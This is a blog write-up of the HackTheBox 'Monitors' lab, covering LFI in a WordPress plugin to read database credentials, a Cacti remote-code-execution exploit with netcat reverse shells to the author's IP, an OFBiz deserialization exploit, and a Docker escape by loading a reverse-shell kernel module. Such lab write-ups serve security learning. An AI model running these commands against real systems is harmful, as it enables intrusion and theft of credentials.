NepCodeX

Byte Musings: Where Tech Meets Curiosity


Monitors Walkthrough – Hackthebox – Writeup

monitors walkthrough hackthebox writeup

Monitors is an active machine from hackthebox. So, unless you are extremely desperate to capture the flag, don’t proceed to the walkthrough. Also, I will try shortening the walkthrough as much as possible. “Monitors Walkthrough – Hackthebox – Writeup”

Note: To write public writeups for active machines is against the rules of HTB. Otherwise, I could protect this blog post using the root flag. Also, I couldn’t find best content locker that allows custom message for wordpress. So, I couldn’t password protect this blog post using other methods like root hash, root only readable file contents, etc.

Walkthrough of spectra from hackthebox

Firstly, let’s remove the default routed added by the VPN server.

sudo route del -net default gw 10.10.14.1 netmask 0.0.0.0 dev tun0

Nmap scan

nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 10.10.10.238 
image 735

Enumerate web server

From the nmap results, we have an HTTP server to enumerate.

image 736

Direct access isn’t available. So, I added monitos.htb to the /etc/hosts file.

image 737

Upon opening with the host name, we get a wordpress website.

image 738

Hence, I used wpscan to find the vulnerable plugins.

wpscan --api-token $WPSCAN_KEY --url http://monitors.htb/ --plugins-detection mixed -e -o wpscan.log
cat wpscan.log
image 739

We got an unauthenticated file inclusion vulnerability in wp spritz plugin. Thus, I opened the links provided and also opened theburp suite proxy to move further. Then, I hit the request and sent it to intruder and repeater.

image 740

As we can see, the LFI worked. Since it’s using file_get_contents function, we cannot execute remote PHP codes. So, I decided to get the credentials from the machine. Hence, I looked for the configuration file of the wordpress.

image 741

I noted down the username and password for mysql. Also, I tried the password to log in as the WordPress admin and log in as marcus to SSH but didn’t succeed. Hence, I decided to check the apache configuration.

Reference: https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/file-inclusion/lfi-linux-list.md

I did the fuzzing with the list above and found out that in the default configuration file, there is a comment.

image 742

Hence, I added the hostname to my hosts file.

image 743

Using admin and the password that I found earlier from the wp-config.php file gave me the access to the machine.

image 744

The version of the service is 1.2.12 that has an authenticated remote code execution exploit.

Reference: https://www.exploit-db.com/exploits/49810

nc -nlvp 4444

# On another tab
python3 exploit.py -t http://cacti-admin.monitors.htb -u admin -p <password> --lhost 10.10.14.60 --lport 4444
image 745

Finally, I got the foothold.

Get user’s shell

First thing, you want to do is make the shell interactive. Otherwise, you are going to regret later. I looked for some stuff manually, but didn’t find anything. Hence, I decided to download the linux enumeration scripts like linpeas, linenum, pspy, etc. However, both wget and curl aren’t installed on the target. Luckily, we have netcat on the machine. Hence, I listened as follows in my local machine.

nc -nlvp 5555 < linpeas.sh 

On the target, I did the following.

cd /tmp
nc 10.10.14.60 5555 > linpeas.sh

I repeated the same for other binaries too and ran the scripts. However, it didn’t give me anything. Then, I searched all files owned by another user and I didn’t find anything. However, when I looked at the home directory of marcus, there is a directory .backup that has unusual permissions. So, I searched for the word marcus in the files of different directories that didn’t have binaries.

grep 'marcus' /etc -R 2>/dev/null
image 746

So, I looked at the content of the file.

cat /home/marcus/.backup/backup.sh
image 747

I got a password that could give me the SSH access to the user marcus.

Get root access

There is a note which refers about docker. So, I listed down the listening ports.

image 748

Hence, I did the SSH tunneling of the port.

ssh -L 8443:127.0.0.1:8443 -R 4444:127.0.0.1:4444 -R 8080:127.0.0.1:8080 [email protected]
image 749

The version has a exploit related to deserialization.

https://www.rapid7.com/db/modules/exploit/linux/http/apache_ofbiz_deserialiation/

image 750
image 751

Next, I used python to create another reverse shell on my local machine. That would allow me to make the shell more interactive using stty.

Now, we are into the docker container. After this, we have to breakout from the container to the host.

cpash --print
image 752

The capability cap_sys_module would allow us to breakout from the container.

Reference: https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd

Following the guide, I copied the source code to get a reverse shell. I changed the IP and the port so that I would listen on the host. For that, I first copied the code to my local machine, edited it and then copied it to the container ‘/’ path.

image 757

Then, I created the Makefile.

image 754

Then, I made the kernel module.

make

It didn’t work. So, I copied the two files to ‘/’ of the container Then, added the gcc library to the path.

mv reverse-shell.c /
mv Makefile /
cd /
export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/8/
make clean
make
image 758

It was succeeded and I could see some new files on the directory. Then, I listened on the port 4445 of the host machine with the SSH login.

nc -nlvp 4445

Lastly, I executed the exploit on the docker container.

insmod reverse-shell.ko

This might not work because you might be working on the shared environment. So, reset your machine and repeat the steps and voila.

image 759

I got the root shell from the monitors host.



0 0 votes
Article Rating
Subscribe
Notify of
guest
2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments